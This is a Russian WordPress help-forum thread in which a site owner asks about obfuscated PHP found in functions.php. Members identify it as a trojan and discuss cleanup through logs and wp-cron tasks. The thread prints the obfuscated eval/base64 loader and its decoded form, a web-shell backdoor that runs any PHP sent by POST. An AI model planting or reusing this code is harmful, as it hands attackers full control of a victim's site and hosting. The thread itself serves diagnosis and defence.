• Никакой политики на форуме. Иначе - бан!
  • Вопрос без рабочей ссылки на проблему считается риторическим. Без ссылки и скриншота - провокацией!
  • Темы озаглавленные с маленькой буквы или капсом удаляются без предупреждения!

Function.php странный код

Macstuff

Форумчанин
Доброго времени суток.
Последние дни просто немеренное кол-во регистраций ботов с yahoo ящиков...
Начал искать решение и нашел вариант с переименованием wp-login.php и там было указано вставить код в function.php. В начале файла я увидел странный код, дешифровать его не смог, после удаления страницы не открывались вовсе, просто белый экран.
Что это?
Спасибо

PHP:
 $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
 

Archibald

Новичок
Это троян.
Части кода не хватает, того что в скобках
base64_decode(strtr(substr($O0O000,$OO0000*2),substr($O0O000,$OO0000,$OO0000),substr($O0O000,0,$OO0000)));
 

joy66

Опытный
Доброго времени суток.
Последние дни просто немеренное кол-во регистраций ботов с yahoo ящиков...
Начал искать решение и нашел вариант с переименованием wp-login.php и там было указано вставить код в function.php. В начале файла я увидел странный код, дешифровать его не смог, после удаления страницы не открывались вовсе, просто белый экран.
Что это?
Спасибо

вот это тебе предлагают вставить
PHP:
<?php
$fukq = @$_GET['fukq'];
if($fukq == 't'){
  echo(@eval($_POST['fuckyou4321']));
  exit;
  }
echo apiRequest();
function apiRequest(){
    if(@$_GET['op'] == 'check')
        {
         return "connectjbmoveisok";
         exit();
        }
}
?>
 

rikitiki

Специалист
Местный
А как этот код действует? Сам functions.php запускает или начинает действовать, когда админ или посетитель на сайт заходят, активируя тем самым functions.php?
 

joy66

Опытный
нет сайт выполнит любой php код , который ему пришлют. То есть теоретически кто-то извне может полностью распоряжаться твоей учетной записью у хостера
 

Macstuff

Форумчанин
Код удалил, но сейчас появилась другая проблема. Каким то образом появляются записи без текста, например, photoshop c4 crack... админ один, пароль сменил
 

searchingman

Гуру
Местный

joy66

Опытный
Код удалил, но сейчас появилась другая проблема. Каким то образом появляются записи без текста, например, photoshop c4 crack... админ один, пароль сменил

Дело в том, что как правило код такой предназначен для внедрения чего-то еще. Например модернизация существующих скриптов, добавления своих файлов тд. Так что без ревизии файлов сайта не обойтись. Неплохо для начала логи апача посмотреть сопоставив со времени добавления записи. Посмотреть какие задачи у wp-cron прописаны.
 

Macstuff

Форумчанин
Дело в том, что как правило код такой предназначен для внедрения чего-то еще. Например модернизация существующих скриптов, добавления своих файлов тд. Так что без ревизии файлов сайта не обойтись. Неплохо для начала логи апача посмотреть сопоставив со времени добавления записи. Посмотреть какие задачи у wp-cron прописаны.

Вот что удалось найти через cpanel, а как понять что это за задания?

Код:
Host: 2a03:c980::1:20:16
/wp-cron.php?doing_wp_cron=1445218820.8918900489807128906250
    Http Code: 200    Date: Oct 19 04:40:20    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445222212.1818981170654296875000
    Http Code: 200    Date: Oct 19 05:36:52    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445224000.7439529895782470703125
    Http Code: 200    Date: Oct 19 06:06:40    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445226476.7103641033172607421875
    Http Code: 200    Date: Oct 19 06:47:56    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445230362.6335949897766113281250
    Http Code: 200    Date: Oct 19 07:52:42    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445230685.1213068962097167968750
    Http Code: 200    Date: Oct 19 07:58:05    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445231859.2687690258026123046875
    Http Code: 200    Date: Oct 19 08:17:39    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445232822.1764910221099853515625
    Http Code: 200    Date: Oct 19 08:33:42    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445236321.2021179199218750000000
    Http Code: 200    Date: Oct 19 09:32:01    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445236859.4292368888854980468750
    Http Code: 200    Date: Oct 19 09:40:59    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=queue,bounce&silent=1
    Http Code: 200    Date: Oct 19 10:02:48    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=bounce&silent=1
    Http Code: 200    Date: Oct 19 10:28:51    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
 

joy66

Опытный
Это выполнение заданий wp-cron, которые зафиксировались логом веб сервера. Это есть у всех, у кого принудительно wp-cron не отключен. Важно узнать что это за задания.
 

joy66

Опытный
Я не знаю, есть ли отдельный плагин для просмотра cron задач. У меня стоит плагин рассылок mailpress там есть инструмент для просмотра запланированных задач и их удаления .

хотя похоже есть http://art-storona.ru/dl/wp-admin/plugin-install.php?tab=search&s=cron
 
Последнее редактирование:

Macstuff

Форумчанин
С помощью Advanced Cron Manager вытащил список заданий.

wp_cache_gc_watcher
hourly In 40 минут
19.10.2015 14:32:42 Execute
wp_scheduled_auto_draft_delete

daily In 5 часов
19.10.2015 18:58:26 Execute
wp_maybe_auto_update

twicedaily In 6 часов
19.10.2015 19:58:00 Execute
woocommerce_tracker_send_event
daily In 7 часов
19.10.2015 21:21:17 Execute
woocommerce_cleanup_sessions
twicedaily In 7 часов
19.10.2015 21:21:17 Execute
wp_cache_full_preload_hook
single In 9 часов
19.10.2015 23:18:41 Execute
updraft_backup
daily In 11 часов
20.10.2015 00:56:15 Execute
wp_version_check

twicedaily In 12 часов
20.10.2015 01:47:31 Execute
wp_update_plugins

twicedaily In 12 часов
20.10.2015 01:47:31 Execute
wp_update_themes

twicedaily In 12 часов
20.10.2015 01:47:31 Execute
execute_periodic_drobox_backup
daily In 13 часов
20.10.2015 03:00:00 Execute
wp_cache_gc
daily In 13 часов
20.10.2015 03:00:00 Execute
woocommerce_scheduled_sales
daily In 16 часов
20.10.2015 06:00:00 Execute
wp_scheduled_delete

daily In 24 часа
20.10.2015 13:47:35 Execute
wp_cache_full_preload_hook
single In 1 месяц
30.11.2015 19:24:04 Execute
 

joy66

Опытный
да вроде ничего подозрительного. Но с другой стороны зловредный код может выполняться и внутри полезного задания.
 

joy66

Опытный
вот какие-то странные обращения к крону. опять же без анализа файлов сайта не обойтись
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=queue,bounce&silent=1
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=bounce&silent=1
 
Сверху Снизу